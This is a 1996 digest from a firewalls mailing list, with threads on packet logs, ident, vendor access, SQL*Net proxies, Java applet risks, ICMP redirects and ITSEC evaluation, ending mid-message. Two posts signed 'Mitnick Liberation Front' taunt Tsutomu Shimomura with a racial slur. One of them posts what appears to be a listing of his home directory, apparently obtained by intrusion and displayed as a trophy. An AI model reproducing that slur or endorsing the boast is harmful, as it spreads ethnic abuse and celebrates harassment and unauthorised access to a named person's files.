206.214.232.100/1867 44 syn !pass(64) > 2/9-10:42:53-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) > 2/9-10:42:55-81 tcp 199.18.25.195/3055 -> 206.214.232.100/www 44 syn > 2/9-10:42:55-81 tcp 199.18.25.195/3056 -> 206.214.232.100/www 44 syn > 2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64) > 2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64) > 2/9-10:42:58-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64) > 2/9-10:42:59-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64) > 2/9-10:43:04-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64) > 2/9-10:43:05-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64) > > When this web site (nslookup returns Facade.COM) is accessed it tries to come > back to your system on port 113. What is this port? (It's not listed in my > /etc/services) ident 113/tcp auth tap # identd Later, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Sat Feb 10 05:39:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA12593 for firewalls-outgoing; Sat, 10 Feb 1996 05:29:25 -0800 (PST) Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA12588 for ; Sat, 10 Feb 1996 05:29:21 -0800 (PST) Received: from maestro.Maestro.COM by relay3.UU.NET with SMTP id QQachx22534; Sat, 10 Feb 1996 08:28:38 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA02963; Sat, 10 Feb 96 08:17:58 EST Date: Sat, 10 Feb 1996 08:17:58 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: Re: SickPuppyChow 1-96, Part One In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sat, 10 Feb 1996, R. M. DuFresne wrote: > You're aware that none of these URL's are correct aren't you? Looks like they got garbled going through the list. Will repost URL'S SP, tCED cDm From firewalls-owner Sat Feb 10 06:55:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA14712 for firewalls-outgoing; Sat, 10 Feb 1996 06:48:46 -0800 (PST) Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA14707 for ; Sat, 10 Feb 1996 06:48:42 -0800 (PST) Received: from East.Sun.COM by mercury.Sun.COM (Sun.COM) id GAA06124; Sat, 10 Feb 1996 06:47:59 -0800 Received: from congress.East.Sun.COM by East.Sun.COM (5.x/SMI-5.3) id AA00076; Sat, 10 Feb 1996 09:47:55 -0500 Received: from traveller.East.Sun.COM by congress.East.Sun.COM (4.1/SMI-4.1) id AA27831; Sat, 10 Feb 96 09:47:52 EST Received: by traveller.East.Sun.COM (SMI-8.6/SMI-SVR4) id JAA05563; Sat, 10 Feb 1996 09:47:53 -0500 From: giff@congress.East.Sun.COM (Wayne Gifford - Internet Commerce Group) Message-Id: <199602101447.JAA05563@traveller.East.Sun.COM> Subject: Re: Non-company Access ?? To: firewalls@greatcircle.com Date: Sat, 10 Feb 1996 09:47:53 -0500 (EST) In-Reply-To: from "firewalls-owner@GreatCircle.COM" at Feb 8, 96 05:27:26 pm X-Mailer: ELM [version 2.4 PL21] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > In a few words .. can anyone tell me how your companies handle requests > for third party access to your networks ? > > I get frequent requests to provide PPP or SLIP access to contractors, > vendors, resellers, distributors, etc. for the purpose of accessing all > sorts of applications and data bases. I also get requests to "open a > hole in the firewall" to allow these folks to access our facilities. > Look into SKIP (Simple Key management for Internet Protocols, a draft Internet spec for doing just this sort of thing. Look at http://skip.incog.com for source and a Solaris implementation giff From firewalls-owner Sat Feb 10 07:09:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA14852 for firewalls-outgoing; Sat, 10 Feb 1996 06:58:09 -0800 (PST) Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA14847 for ; Sat, 10 Feb 1996 06:58:05 -0800 (PST) Date: Sat, 10 Feb 1996 9:57:20 -0500 (EST) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <960210095720.20214ab9@hobbes.orl.mmc.com> Subject: Dead end concepts Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >1. Encryption-You have a user friendly screen to select the drive, directory >and files that you want to encrypt. Chosen files for encryption are >grouped together and compiled into a single executable file with an assigned >password you enter. There is no limitation on the password size. Overseas >distribution of the encrypted files is not restricted. File encryption >often takes less then ten seconds. Give me a break. Why is is that everyone and their uncle wants to do individual file encryption ? I have and use ViaCrypt's PGP for that and the Business Edition has a lot more advantages. >2. Decryption- Allows you to select the drive, directory and file you want >to decrypt. The password is requested once you select the encrypted file. >Decryption is performed in Windows or Windows 95 with the freely distributed > decryption module. Decryption module is sent to each receiver with no >licensing requirement. Decryption of the executable file may also be >performed at the DOS prompt with no additional software. Understand. This is a way to end-run ITAR. But ITAR is going away so why bother ? Now why do I say it is going away ? Look at ITAR section XIII (b) exclusions and the MasterCard/Visa/Microsoft/Netscape alliance (exercise is left to the student 8*). If you want evidence of the size of the market, look at AT&T's waiver of the traditional $50 cardholder liability on Wordnet. Further corporations and big users do not need to encrypt individual files for the most part, they need to encrypt channels (to avoid volume analysis) between their sites and the entire notebook/computer, not some files. Heck, corporate users have trouble understanding when to run and not to run macros in WORD documents and you expect them to be dilligent about what files to encrypt before mailing ? Just as we had to move protection from the workstation/node level to the network/subnet (e.g. firewalls), transaction protection must also be moved. I am seeing a lot of whole keys on blue backgrounds these days... Warmly, Padgett From firewalls-owner Sat Feb 10 07:57:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA16393 for firewalls-outgoing; Sat, 10 Feb 1996 07:45:06 -0800 (PST) Received: from cais.cais.com (cais.com [199.0.216.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA16387 for ; Sat, 10 Feb 1996 07:45:02 -0800 (PST) Received: from [198.69.129.16] (fwoyach.cais.com [198.69.129.16]) by cais.cais.com (8.6.10/8.6.5) with SMTP id KAA25644 for ; Sat, 10 Feb 1996 10:44:13 -0500 Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 10 Feb 1996 10:43:48 -0500 To: Firewalls@GreatCircle.COM From: fwoyach@cais.cais.com (Frederick Woyach) Subject: Re: SQL*Net proxy? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >From: gary flynn >Date: Tue, 6 Feb 1996 12:40:27 -0500 >Subject: Re: SQL*Net proxy? > >> Has anyone successfully configured a proxy for outbound/inbound SQL*Net >> transactions? >> >> In my observations, Unix to Unix server communications take place on a >> designated port, but PC to Unix communications switch port numbers after >> about 20-25 packets. >> >> The PC always sends to the designated port, but the Unix server changes >> to a different port. This makes filtering difficult. >> > >Oracle servers that are configured as mulithreaded wil use dynamic >ports. Several firewall vendors are working with Oracle to develop >a SQLnet proxy. I don't know the timeframe. > I haven't spoken to all 7 vendors Oracle says they are working with but by telephone : TIS says approximately the end of the first quarter. Raptor says about the end of the 2nd quarter. In the meantime, I believe these are based in part on the Oracle Multiprotocol Interchange product. Which is expensive and brittle as a firewall proxy, so you might want to wait. Also, you might see an old bug requiring a server dedicated line in the client tnsname.ora file: " (CONNECT_DATA = (SID =demo) (server=dedicated) " where SID is the database identifier. BTW, I am also loooking into using the Sybase Audit server as a firewall proxy. Does anyone have any info/experience on this? Frederick Woyach Senior Staff Eng. It's never too late Locheed Martin to have a happy voice message: (703) 264-6400 childhood! ext 2642246 (its my mailbox) Email: fwoyach@aol.com fwoyach@cais.com From firewalls-owner Sat Feb 10 08:24:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA17573 for firewalls-outgoing; Sat, 10 Feb 1996 08:10:59 -0800 (PST) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id IAA17566 for ; Sat, 10 Feb 1996 08:10:54 -0800 (PST) Received: from clark.net (proberts@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id LAA05280; Sat, 10 Feb 1996 11:10:11 -0500 (EST) Received: (from proberts@localhost) by clark.net (8.7.1/8.7.1) id LAA06159; Sat, 10 Feb 1996 11:10:10 -0500 (EST) Date: Sat, 10 Feb 1996 11:10:09 -0500 (EST) From: "Paul D. Robertson" To: "Joe Smith (Really!)" cc: firewalls@GreatCircle.COM Subject: Re: anybody know of any vulnerabilities with "echo" In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sat, 10 Feb 1996, Joe Smith (Really!) wrote: > What is the loss of disabling echo? Or discard for that matter. Some ping-like aps won't function. Discard will probably use just about as much overhead as the stack dropping a packet that isn't addressed to a listening port. As an aside, has anyone tried the source endpoint as loopback's port 7? I don't have a decent machine that I can kill right now, but I'd think that it might be interesting. It doesn't do the network damage that picking two machines on the same subnet does, but could be a strong DOS against a single machine. (I've always taken the built-in services out of inetd.conf on *all* my public, and most of my private hosts, though echo has been a useful replacement for ping in the past between subnets where I pass TCP but not ICMP or UDP). Just in case anyone is still paying attention, make sure that you've screened the loopback address on your outside screening routers along with your local subnets that protect against spoofing. Paul. ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From firewalls-owner Sat Feb 10 08:39:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA18614 for firewalls-outgoing; Sat, 10 Feb 1996 08:30:46 -0800 (PST) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id IAA18595 for ; Sat, 10 Feb 1996 08:30:40 -0800 (PST) Received: from clark.net (proberts@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id LAA07650; Sat, 10 Feb 1996 11:29:55 -0500 (EST) Received: (from proberts@localhost) by clark.net (8.7.1/8.7.1) id LAA09373; Sat, 10 Feb 1996 11:29:54 -0500 (EST) Date: Sat, 10 Feb 1996 11:29:54 -0500 (EST) From: "Paul D. Robertson" To: Jeff Murphy cc: mdr@vodka.sse.att.com, Firewalls@GreatCircle.COM Subject: Re: JAVA security problem ? In-Reply-To: <199602091826.NAA15491@smurfland.cit.buffalo.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 9 Feb 1996, Jeff Murphy wrote: > in netscape, you open a URL .. http://www.foo.com/applet.html > > and it downloads an applet.. the applet attempts to open a socket > to 'firewall.your.com' and it fails... because the socket class that > is available via netscape only permits it to connect to the host > designated in the above URL. if you can use IP spoofing to change the > URL listing in the "Location:" box of a browser.. i'd be fairly impressed. > It's not in the box on the screen that it gets this though, it's in storage, and with Netscape 2.0 you can run plug-in modules. PCs running Win*, and Macintoshes runing System* don't have application level protected memory, right? So, all I need is a plug-in that sits around and waits for the Java code to start executing and overloads one of the standard callback functions with evil code, no? It's been forever since I did any Win* development, but unless things have changed quite significantly, all it would take is "click here to get the nifty plug in", "Install the nifty plug-in", "Go to the gee-wizz-neat-o java site from the nifty plug-in" I'd think that mime apps are the same sort of risk, and it really doesn't take Java to do this, but it sure is nice to be able to modify the attack code without getting the user to download new code each time, and run an installation. I'd *really* like to see a version of Netscape, and a few other popular desktop TCP/IP apps that woudn't run code (including itself) that wasn't signed by a site administrator with a digital signature/checksum. Hell, I'd pay extra for that! If another vendor offered a trade-in on registered Netscape browsers, and had this functionality, they'd get my business exclusively (hint, hint -- it's worth a try). > after think about it a bit more than i really wanted to.. i dont see how > an applet can get around only being able to connect to www.foo.com. > After thinking about it for a lot longer than I really wanted to, I think that other than doing some CNAME or other DNS aliasing that someone else has already explored (wonder what the code actually checks for? Was this in the alpha release? I may still have that code somewhere...) there's much more harm to be done with plug-ins, mime types, rouge DLLs, message handlers, and callbacks. That doesn't mean that I'm thrilled with Java opening sockets though. Paul. ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From firewalls-owner Sat Feb 10 10:09:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA22901 for firewalls-outgoing; Sat, 10 Feb 1996 10:02:50 -0800 (PST) Received: from count04.mry.scruznet.com (count04.mry.scruznet.com [204.147.227.68]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA22863 for ; Sat, 10 Feb 1996 10:02:38 -0800 (PST) From: firewalls@count04.mry.scruznet.com Received: from count04.mry.scruznet.com (localhost [127.0.0.1]) by count04.mry.scruznet.com (8.7.3/8.7.1) with ESMTP id JAA03551; Sat, 10 Feb 1996 09:55:16 -0800 (PST) Message-Id: <199602101755.JAA03551@count04.mry.scruznet.com> To: Sick Puppy cc: firewalls@GreatCircle.COM, firewalls@count04.mry.scruznet.com Subject: Re: Hoo Dat? In-reply-to: Your message of "Thu, 08 Feb 1996 14:17:36 EST." Date: Sat, 10 Feb 1996 09:55:15 -0800 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk on the so-call intruders... its looks like a noc scan from tkined or certain badly written clients I have observerd it is supposedly coming from you nic .... got the raw data?? cheers kelly From firewalls-owner Sat Feb 10 11:09:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA25068 for firewalls-outgoing; Sat, 10 Feb 1996 11:03:52 -0800 (PST) Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA25063 for ; Sat, 10 Feb 1996 11:03:48 -0800 (PST) Received: from maestro.Maestro.COM by relay6.UU.NET with SMTP id QQaciu18635; Sat, 10 Feb 1996 14:03:04 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA09641; Sat, 10 Feb 96 13:52:24 EST Date: Sat, 10 Feb 1996 13:52:24 -0500 (EST) From: Sick Puppy To: firewalls@count04.mry.scruznet.com Cc: firewalls@GreatCircle.COM, firewalls@count04.mry.scruznet.com Subject: Re: Hoo Dat? In-Reply-To: <199602101755.JAA03551@count04.mry.scruznet.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Got pretty long logs like the ones I posted, of three d00ds having a go one after the other. The sniffers I have buried in networks capture gigabytes of data every week so I only pull out key fields. If those logs were from a firewall, they would read something like: Date/time UDP from xxx.xxx.xxx.xxx on unserved port nnn Date/time TCP from xxx.xxx.xxx.xxx on unserved port mmm Unless someone especially wants to see the logs posted on the list, will e-mail them to you. Sick Puppy, the Cat_Eating_Dawg From firewalls-owner Sat Feb 10 11:39:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA25737 for firewalls-outgoing; Sat, 10 Feb 1996 11:30:42 -0800 (PST) Received: from tera.bctel.net (tera.bctel.net [204.174.64.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA25732 for ; Sat, 10 Feb 1996 11:30:39 -0800 (PST) Received: (from nobody@localhost) by tera.bctel.net (8.7.1/8.7.1) id LAA04563 for ; Sat, 10 Feb 1996 11:30:34 -0800 (PST) X-Authentication-Warning: tera.bctel.net: nobody set sender to using -f Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) id sma004553; Sat Feb 10 11:30:25 1996 Received: (from murrell@localhost) by mocha.bctel.net (8.7.1/8.7.1) id LAA16574 for firewalls@greatcircle.com; Sat, 10 Feb 1996 11:31:03 -0800 (PST) From: Brian Murrell Message-Id: <199602101931.LAA16574@mocha.bctel.net> Date: Sat, 10 Feb 1996 11:31:02 -0800 (PST) To: firewalls@greatcircle.com Subject: lotsa ICMP redirects lateley?? X-Mailer: Ishmail-demo 1.2-960125-sol24 MIME-Version: 1.0 Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I've been seeing (and dropping) quite a few router redirects lateley. These seem to be coming from about 4 or 5 different sites/routers. The part I don't get is why would a router legitimately send an icmp redirect to another router many hops away?? I can't see how an icmp redirect is useful to any router except the one that just sent the packet, and that being, why would a router send icmp redirects many hops away?? b. -- Brian J. Murrell murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. brian@wimsey.com 604 454 5261 From firewalls-owner Sat Feb 10 12:24:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA27173 for firewalls-outgoing; Sat, 10 Feb 1996 12:20:04 -0800 (PST) Received: from count04.mry.scruznet.com (count04.mry.scruznet.com [204.147.227.68]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA27161 for ; Sat, 10 Feb 1996 12:20:00 -0800 (PST) From: firewalls@count04.mry.scruznet.com Received: from count04.mry.scruznet.com (localhost [127.0.0.1]) by count04.mry.scruznet.com (8.7.3/8.7.1) with ESMTP id MAA03720; Sat, 10 Feb 1996 12:12:41 -0800 (PST) Message-Id: <199602102012.MAA03720@count04.mry.scruznet.com> To: Sick Puppy cc: firewalls@count04.mry.scruznet.com, firewalls@GreatCircle.COM, firewalls@count04.mry.scruznet.com Subject: Re: Hoo Dat? In-reply-to: Your message of "Sat, 10 Feb 1996 13:52:24 EST." Date: Sat, 10 Feb 1996 12:12:41 -0800 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Again tkined and other free noc software is especially noisy if commanded to do certain functions. considering the logs tracks on the ip back to a nic its one possible cause the real tail :) is told by the raw packet dump and doing forensics on that... BTW when I was locking horns with an italian hacker who was attacking the IETF 95 San Jose IETF NOC I saw almost this identical signature in that case the individual who showed up at the ietf claimed his machine was running VMS and Multinet and this was typical behaviour for its x-windows clients. Having a VMS hacker type in the noc we asked him to simulate this on his machine located in aus... the behaviour wasnt the same and the security policy at the cisco was changed to log and then drop the packets on the floor. As we had so many attendees and so much insecurity to deal with we simply elected to limit our risk (and cause some hard feelings...) you may want to contact the POC in the whois sent you cheers kelly From firewalls-owner Sat Feb 10 13:09:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA28921 for firewalls-outgoing; Sat, 10 Feb 1996 13:03:11 -0800 (PST) Received: from westie.gi.net (westie.gi.net [198.247.250.16]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA28893 for ; Sat, 10 Feb 1996 13:03:01 -0800 (PST) Received: (from alan@localhost) by westie.gi.net (8.7.1/8.7.1) id OAA25982; Sat, 10 Feb 1996 14:58:51 -0600 (CST) From: Alan Hannan Message-Id: <199602102058.OAA25982@westie.gi.net> Subject: Re: Hoo Dat? To: firewalls@count04.mry.scruznet.com Date: Sat, 10 Feb 1996 14:58:51 -0600 (CST) Cc: sikpuppy@Maestro.COM, firewalls@GreatCircle.COM In-Reply-To: <199602102012.MAA03720@count04.mry.scruznet.com> from "firewalls@count04.mry.scruznet.com" at Feb 10, 96 12:12:41 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ] Again tkined and other free noc software is especially ] noisy if commanded to do certain functions. Tools don't annoy people, people annoy people. -alan From firewalls-owner Sat Feb 10 14:56:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA03635 for firewalls-outgoing; Sat, 10 Feb 1996 14:52:00 -0800 (PST) Received: from gxl.woodtech.com (gxl.woodtech.com [204.248.87.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA03629 for ; Sat, 10 Feb 1996 14:51:56 -0800 (PST) Received: (from joey@localhost) by gxl.woodtech.com (8.6.12/8.6.12) id QAA30156; Sat, 10 Feb 1996 16:57:45 -0600 Date: Sat, 10 Feb 1996 16:57:45 -0600 (CST) From: "Joe Smith (Really!)" To: firewalls@greatcircle.com Subject: syslog Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm looking for some good documentation on syslog and the syslog.conf file. From firewalls-owner Sat Feb 10 17:40:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA08768 for firewalls-outgoing; Sat, 10 Feb 1996 17:25:06 -0800 (PST) Received: from azazel.sdsc.edu (azazel.sdsc.edu [132.249.22.242]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id RAA08763 for ; Sat, 10 Feb 1996 17:25:03 -0800 (PST) Received: (bhass@localhost) by azazel.sdsc.edu (8.7.1/8.6.10) id RAA24100 for firewalls@greatcircle.com; Sat, 10 Feb 1996 17:24:20 -0800 (PST) Date: Sat, 10 Feb 1996 17:24:20 -0800 (PST) From: Brosl Hasslacher Message-Id: <199602110124.RAA24100@azazel.sdsc.edu> To: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings and Salutations from the Mitnick Liberation Front It seems that once again, that slanty-eyed chink Tsutomu has made another dollar at the expense of a hacker, Kevin Mitnick. In reality, Kevin Mitnick had no skills. But we do. Tsutomu's Kung-Foo is _still_ no good. Maybe we should read his book to be "skilled" in the art of Unix security? Nah. %dh% From firewalls-owner Sat Feb 10 18:10:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA08885 for firewalls-outgoing; Sat, 10 Feb 1996 17:30:49 -0800 (PST) Received: from azazel.sdsc.edu (azazel.sdsc.edu [132.249.22.242]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id RAA08878 for ; Sat, 10 Feb 1996 17:30:46 -0800 (PST) Received: (bhass@localhost) by azazel.sdsc.edu (8.7.1/8.6.10) id RAA24174 for firewalls@greatcircle.com; Sat, 10 Feb 1996 17:30:03 -0800 (PST) Date: Sat, 10 Feb 1996 17:30:03 -0800 (PST) From: Brosl Hasslacher Message-Id: <199602110130.RAA24174@azazel.sdsc.edu> To: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk total 1846 drwxr-xr-x 6 tsutomu 512 Jan 7 22:32 . drwxr-xr-x 23 root 512 Feb 6 10:50 .. -rw-r--r-- 1 tsutomu 803 Feb 17 1994 .cshrc drwx------ 2 tsutomu 512 Feb 20 1994 .elm -rw-r--r-- 1 tsutomu 18920 Feb 17 1994 .emacs -rw-r--r-- 1 tsutomu 2934 Feb 18 1994 .login -rw-r--r-- 1 tsutomu 51 Feb 17 1994 .logout -rw-r--r-- 1 tsutomu 71406 Jul 2 1994 .newsrc -r-------- 1 tsutomu 37 Apr 4 1994 .rhosts -rw-r--r-- 1 tsutomu 42 Jul 2 1994 .rnlast -rw-r--r-- 1 tsutomu 7340 Jul 2 1994 .rnsoft -rw-r--r-- 1 tsutomu 143 Feb 17 1994 .signature drwx------ 2 tsutomu 512 Feb 20 1994 Mail drwxr-xr-x 2 tsutomu 512 Jul 2 1994 News drwx------ 11 tsutomu 1536 Feb 21 1994 cops_104 -rw-r--r-- 1 tsutomu 39660 Jan 7 22:32 f1.tgz -rw-r--r-- 1 tsutomu 233350 Mar 13 1994 gnus.tar.gz -rw-r--r-- 1 tsutomu 1383817 Mar 1 1994 ppp.tar.Z -rwxr-xr-x 1 tsutomu 24576 May 14 1994 whichiufpu -rwxr-xr-x 1 tsutomu 57344 Aug 23 22:17 xmodem -rw-r--r-- 1 tsutomu 290 Aug 23 22:22 xmodem.log -rw-r--r-- 1 tsutomu 13481 Aug 23 22:17 xmodem.man From firewalls-owner Sat Feb 10 19:31:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA12780 for firewalls-outgoing; Sat, 10 Feb 1996 19:09:14 -0800 (PST) Received: from alsys1.aecom.yu.edu (alsys1.aecom.yu.edu [129.98.1.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA12760 for ; Sat, 10 Feb 1996 19:09:07 -0800 (PST) Received: from yu1.yu.edu by alsys1.aecom.yu.edu with SMTP id AA29432 (5.67b/IDA-1.5/AECOM-RIT for ); Sat, 10 Feb 1996 22:08:09 -0500 Received: by yu1.yu.edu (AIX 3.2/UCB 5.64/4.03) id AA88097; Sat, 10 Feb 1996 22:07:43 -0500 Date: Sat, 10 Feb 1996 22:07:42 -0500 (EST) From: Mervyn Frankel To: "Jason L. Haar" Cc: brian@ilinx.bctel.net, brian_murrell@bctel.net, firewalls@GreatCircle.COM Subject: 125 megabit infra-red In-Reply-To: Message-Id: Organization: Yeshiva University Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Infra-red offers security that other technologies do not, Do you know of anyone that might be interested in this technology? Can anyone think of applications not mentioned in this blurb? Merv ============================================================================ SUBJECT: HIGH-SPEED INFRA-RED NETWORK SYSTEM DATE: January 25, 1996 ---------------------------------------------------------------------------- The networking company claims it has leaped the networking industry with its latest release, an infra-red networking system that works at distances of up to 500 meters at data transmission speeds of 125 megabits- per-second (Mbps) under normal weather conditions 230 meters under the worst conditions. A spokesperson for the company, told that traditional infra-red systems have worked at between one and sixteen Mbps, while for faster speeds, some networking companies have turned to laser systems. "The problem with many laser "wireless" airlinks is that anyone who looks into the line of the laser light puts their eyesight at risk," he said. "If you put a laser airlink system on your roof and a guy who is cleaning windows happens to peek into the light source, the company opens itself up to a possible lawsuit. With the new device, you avoid that problem, as well as opening up high-speed transparent networking over long distances." The company claims that the system can operate at distances of several kilometers, but the specified maximum is 500 meters. "This allows the system to work in most weather conditions, including rain, snow, and light fog. At longer distances you tend to get fading under certain weather conditions, so we don't recommend beyond 500 meters for this reason," . A spokesman claims that the wireless infra-red airlink system is the networking industry's first LED (light emitting diode)-based wireless system to achieve ultra fast data rates, and so support ATM (asynchronous transfer mode), Fast Ethernet (100Mbps) and FDDI (Fiber Distributed Data Interface) bypass applications. Leasing fiber optic links between buildings can take several months in some countries and situations. The system, meanwhile, can be installed quickly and efficiently, with a complete system, including two stations, costing from $10,000 to $15,000. "If you just want a single network application, such as Token Ring or Ethernet, the price is the lower reaches of this band, while if you want a transparent link that can handle all network technologies, it's towards the higher end of this price band," was explained. Merv Frankel President Speedy Computer Solutions LAN/WAN Internetworking Specialists 144-16 68 Drive Flushing,New York 11367-1735 718-261-7754 718-263-8107 fax From firewalls-owner Sat Feb 10 19:39:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA12334 for firewalls-outgoing; Sat, 10 Feb 1996 18:55:59 -0800 (PST) Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA22872 for ; Fri, 9 Feb 1996 10:48:35 -0800 (PST) Received: from tsgops.rtp.dg.com by dg-rtp.dg.com (5.4R3.10/dg-rtp-v02) id AA05744; Fri, 9 Feb 1996 13:47:36 -0500 Received: by tsgops.rtp.dg.com (5.4R3.10/200.8.1.3) id AA09066; Fri, 9 Feb 1996 13:47:29 -0500 From: spencerj@dg-rtp.dg.com (Jon Spencer) Message-Id: <9602091847.AA09066@tsgops.rtp.dg.com> Subject: Re: Most Secure Unix? To: ianj-b@dial.pipex.com (Ian Johnstone-Bryden) Date: Fri, 9 Feb 1996 13:47:29 -0500 (EST) Cc: firewalls@greatcircle.com In-Reply-To: from "Ian Johnstone-Bryden" at Feb 8, 96 05:43:36 pm X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [SNIP] Ian writes in response to Rolf, who wrote in repsonse to me, ... > I would have been much happier if ITSEC Scheme Body Secretariats > warranted the certificates which they issue. It is a point which I > have regularly raised from the first working parties on the drafting > and adoption of ITSEC. Unfortunately, the Scheme Body Secretariats > are staffed by government employees who are reluctant to put their > money where their mouth is. As someone who is currently in E4 eval with a greater than F/B2 Unix product I have thought about this issue of "warranteeing" such a certification. What would the warrantee provide protection from? What omissions are OK and which ones are not OK? This would be a barrister's dream! I think that reasonable people can come to an understanding on these issues. However, there are some very complicated issues. For example, our claim of "virus prevention" has been accepted by the UK ITSEC folks as an evaluatable claim. Note that this is the first time at any level that they have accepted ANY virus-related claim. So we make some statements about what must be true for this to be effective. If a virus does indeed get into the system, there are (at least) four possibilities as to how it happenned: (1) Our virus prevention claim was made in error, but that error was not 